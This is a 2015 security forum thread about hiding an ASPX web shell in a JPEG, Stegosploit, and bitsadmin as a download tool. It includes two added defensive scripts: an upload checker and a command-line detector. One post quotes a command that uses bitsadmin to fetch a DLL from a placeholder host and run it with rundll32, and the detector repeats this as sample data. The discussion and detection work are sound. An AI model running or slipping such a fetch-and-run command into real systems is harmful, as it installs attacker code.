How to use a malicious JPEG to hack corporate networks

Discussion in 'other security issues & news' started by Minimalist, Apr 20, 2015.

  1. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    http://securityaffairs.co/wordpress/36130/hacking/malicious-jpeg-hack-corporate-networks.html
     
  2. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,738
    Now that is quite the exploit if I read correctly (didn't manage to see the video).
     
  3. Minimalist

    I've checked only the beginning. He updates attributes of the jpeg file (using the comment field) and puts active content (aspx shell) in it. Then he renames the jpg to aspx and uploads it. The server accepts it. When viewing the modified picture, the shell executes. After that I guess it's game over.
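
The upload step described in the post above, seen from the server side, as an added example that is not part of the original thread: a check that rejects non-image extensions and flags script-like text in JPEG comment and metadata segments. The allowlist, the marker list and the sample files are constructed assumptions.

```python
import struct

ALLOWED_EXT = {".jpg", ".jpeg"}
SCRIPT_MARKERS = (b"<%", b"<script", b"<?php")  # heuristic list, an assumption

def jpeg_segments(data):
    """Yield (marker, payload) for each header segment before start-of-scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt segment header")
        marker = data[pos + 1]
        if marker == 0xDA:  # SOS: entropy-coded image data follows
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("bad segment length")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def check_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means accept."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons = []
    if ext not in ALLOWED_EXT:
        # The server picks a handler by extension, so this is the key check.
        reasons.append(f"extension {ext or '(none)'} not allowed")
    try:
        for marker, payload in jpeg_segments(data):
            # COM is 0xFE; APP0-APP15 (0xE0-0xEF) carry JFIF/EXIF/XMP metadata.
            if marker == 0xFE or 0xE0 <= marker <= 0xEF:
                if any(m in payload.lower() for m in SCRIPT_MARKERS):
                    reasons.append(f"script-like text in segment 0x{marker:02X}")
    except ValueError as exc:
        reasons.append(str(exc))
    return reasons

def build_jpeg(comment):
    """Constructed sample: SOI, JFIF APP0, COM, empty SOS, EOI (no pixels)."""
    def seg(marker, payload):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return b"\xff\xd8" + seg(0xE0, app0) + seg(0xFE, comment) + b"\xff\xda\x00\x02\xff\xd9"

if __name__ == "__main__":
    print(check_upload("photo.jpg", build_jpeg(b"holiday 2015")))
    print(check_upload("photo.aspx", build_jpeg(b'<%@ Page Language="C#" %>')))
```

The segment scan is a heuristic; re-encoding accepted images and storing them where the server will not execute them removes the dependency on it.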
     
  4. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,466
    Didn't see the video. @Minimalist, from your description this is an IIS problem? Sounds almost in the same vein as Shellshock, really.

    BTW

    Not sure the domain controller would dependably allow file uploads? I know very little about AD and LDAP on Windows. That said, environments where Linux or UNIX servers are administered from poorly secured Windows workstations tend to give me the willies...
     
  5. Minimalist

    From what I've seen at the beginning I can't tell if the problem is in IIS, ASP or a problematic function/program. It's also only the first step in the exploit chain and the shell is run under user rights.
     
  6. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes, I remember this!

    There was a long thread at DSLR where Wayne (owner of DiamondCS) demonstrated the technique of modifying a JPEG file.

    That exploit's payload was a file written to disk, which was an easy block for those who had such protection. I'm not sure exactly what is going on in this current exploit:
    Well, we don't know if this is true always or not: what types of other protection does the network have?

    (DiamondCS was a company ahead of its time in many ways. ProcessGuard and WormGuard were wonderful products -- some still use ProcessGuard. I was evaluating different anti-executable products at that time, and was impressed with ProcessGuard.)

    ----
    rich
     
  8. noone_particular

    A short time ago in another thread that asked about file types that can be used maliciously (too lazy to find it ATM), someone mentioned that many of those were not issues on up to date systems. Yet here we are again with file types one would assume to be safe being used as attack vectors again.
     
  9. WildByDesign

    WildByDesign Registered Member

    Joined:
    Sep 24, 2013
    Posts:
    2,587
    Location:
    Toronto, Canada
    Inspired by Marcus Murray's presentation (https://vimeo.com/103938583), security researcher and developer of Bouncer, Florian Rienhardt, has written a follow-up on his blog which includes an adaptation to the presented method and was able to utilize Microsoft's built-in bitsadmin.exe to achieve similar execution of malicious downloads.


    Blog: http://bitnuts.de/
    Research on bitsadmin.exe: Microsoft’s built in Malware Dropper?
    2015/05/21 by Flo

    Code:
    cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0
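
A detection example for the command quoted above, added here and not part of the original post or the blog: it flags process command lines in which a `bitsadmin /transfer` writes to a user-writable location and the same file is then handed to rundll32 or regsvr32. The sample events, the path list and the severity labels are constructed assumptions.

```python
import re

# Constructed process-creation command lines, as would be read from
# Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing.
SAMPLE_EVENTS = [
    r"cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH "
    r"hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0",
    r"bitsadmin /list /allusers",
    r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r'bitsadmin.exe /transfer job1 /download https://updates.example.com/tool.msi '
    r'"C:\Program Files\Tool\tool.msi"',
]

# bitsadmin /transfer <job> [/download|/upload] [/priority <level>] <url> <dest>
TRANSFER = re.compile(
    r'bitsadmin(?:\.exe)?\s+/transfer\s+\S+(?:\s+/(?:download|upload|priority\s+\S+))*'
    r'\s+(?P<url>\S+)\s+(?P<dest>"[^"]+"|\S+)', re.I)

# Locations a standard user can write to (assumed list, extend per environment).
USER_WRITABLE = re.compile(
    r"%te?mp%|%appdata%|\\appdata\\|\\users\\public\\|\\windows\\temp\\", re.I)

def classify(cmdline):
    """Return (severity, url, dest) for a bitsadmin transfer, else None."""
    m = TRANSFER.search(cmdline)
    if not m:
        return None
    dest = m.group("dest").strip('"')
    # Is the downloaded file passed straight to a DLL loader in the same line?
    loader = re.search(
        r'(?:rundll32|regsvr32)(?:\.exe)?\s+"?' + re.escape(dest), cmdline, re.I)
    score = bool(USER_WRITABLE.search(dest)) + bool(loader)
    return (("low", "medium", "high")[score], m.group("url"), dest)

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify(event), "<-", event[:60])
```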
     
  10. Minimalist

  11. Gullible Jones

    Noscript et al. could potentially work against that, due to the first stage JS needed to load the code embedded in the image. Also it still has to deliver an effective exploit, including a sandbox escape in the case of Chrome or IE. It'd be a heck of a vehicle for delivering the actual attack though.
     
  12. ichito

    ichito Registered Member

    Joined:
    Jan 14, 2011
    Posts:
    1,997
    Location:
    Poland - Cracow
    Saumil Shah has said
    http://www.net-security.org/secworld.php?id=18443
    http://motherboard.vice.com/read/how-you-can-get-hacked-just-by-looking-at-a-picture-online
    and of course those words can be scary... but I found the text on the blog below and I think it lowers the "charm" of Stegosploit
    https://medium.com/@christianbundy/why-stegosploit-isn-t-an-exploit-189b0b5261eb
    Is it a real danger or only the researcher's mistake?

    BTW... below is the author's presentation
    http://conference.hitb.org/hitbsecc...il-Shah-Stegosploit-Hacking-with-Pictures.pdf
     